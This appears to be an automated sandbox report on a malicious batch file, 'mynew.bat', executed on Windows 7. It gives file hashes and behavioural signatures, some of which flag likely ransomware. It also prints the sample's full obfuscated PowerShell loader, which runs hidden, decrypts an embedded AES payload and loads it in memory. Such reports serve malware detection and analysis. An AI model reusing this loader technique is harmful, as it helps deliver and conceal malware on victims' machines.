Analysis
-
max time kernel
46s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
04-01-2023 06:45
Static task
static1
Behavioral task
behavioral1
Sample
mynew.bat
Resource
win7-20220812-en
General
-
Target
mynew.bat
-
Size
49KB
-
MD5
f010a779fc5fa3c0d6ef8d08cf2f82c3
-
SHA1
37dec5efe2443e43a4290473b372a40bd9f494f9
-
SHA256
7361111dc12ff526cb5391edfadb0a9ce69e75ba8d12b31122b224f9644290c0
-
SHA512
b76595be308c2e5c23e1f7e578573b1e108885d868a34ae10f18756de7f27f9be1beebc31b2e8275851bfa898f1a15b758ce3f903e7c888895a7779471670db8
-
SSDEEP
768:m/7oBdu40Ozbblz1Osan4ha4j0YJDH7bzzE1k07LEHZMIXlOJFt0X495YrS8ra:aEBvHblRI4hJDHnk1dvEVwJL649O2
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
mynew.bat.exepid process 1560 mynew.bat.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 2020 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
mynew.bat.exepid process 1560 mynew.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
mynew.bat.exedescription pid process Token: SeDebugPrivilege 1560 mynew.bat.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2020 wrote to memory of 1560 2020 cmd.exe mynew.bat.exe PID 2020 wrote to memory of 1560 2020 cmd.exe mynew.bat.exe PID 2020 wrote to memory of 1560 2020 cmd.exe mynew.bat.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\mynew.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\mynew.bat.exe"mynew.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $Hnouz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\mynew.bat').Split([Environment]::NewLine);foreach ($aOvdy in $Hnouz) { if ($aOvdy.StartsWith(':: ')) { $VFBbN = $aOvdy.Substring(3); break; }; };$APbgZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFBbN);$TxOqK = New-Object System.Security.Cryptography.AesManaged;$TxOqK.Mode = [System.Security.Cryptography.CipherMode]::CBC;$TxOqK.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$TxOqK.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OHLMkWak0mShc6SWbTBetVDMdS/ZPNqnInWDRzUQwCY=');$TxOqK.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QyA1AR4yRiYXGDMq0ZKCyQ==');$mOLfG = $TxOqK.CreateDecryptor();$APbgZ = $mOLfG.TransformFinalBlock($APbgZ, 0, $APbgZ.Length);$mOLfG.Dispose();$TxOqK.Dispose();$nIAlk = New-Object System.IO.MemoryStream(, $APbgZ);$GUMsr = New-Object System.IO.MemoryStream;$ourVj = New-Object System.IO.Compression.GZipStream($nIAlk, [IO.Compression.CompressionMode]::Decompress);$ourVj.CopyTo($GUMsr);$ourVj.Dispose();$nIAlk.Dispose();$GUMsr.Dispose();$APbgZ = $GUMsr.ToArray();$uPpYS = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($APbgZ);$vzwYm = $uPpYS.EntryPoint;$vzwYm.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\mynew.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
\Users\Admin\AppData\Local\Temp\mynew.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
memory/1560-55-0x0000000000000000-mapping.dmp
-
memory/1560-57-0x000007FEFC2C1000-0x000007FEFC2C3000-memory.dmpFilesize
8KB
-
memory/1560-58-0x000007FEF3F40000-0x000007FEF4963000-memory.dmpFilesize
10.1MB
-
memory/1560-60-0x00000000026E4000-0x00000000026E7000-memory.dmpFilesize
12KB
-
memory/1560-59-0x000007FEF33E0000-0x000007FEF3F3D000-memory.dmpFilesize
11.4MB
-
memory/1560-61-0x00000000026E4000-0x00000000026E7000-memory.dmpFilesize
12KB
-
memory/1560-62-0x00000000026EB000-0x000000000270A000-memory.dmpFilesize
124KB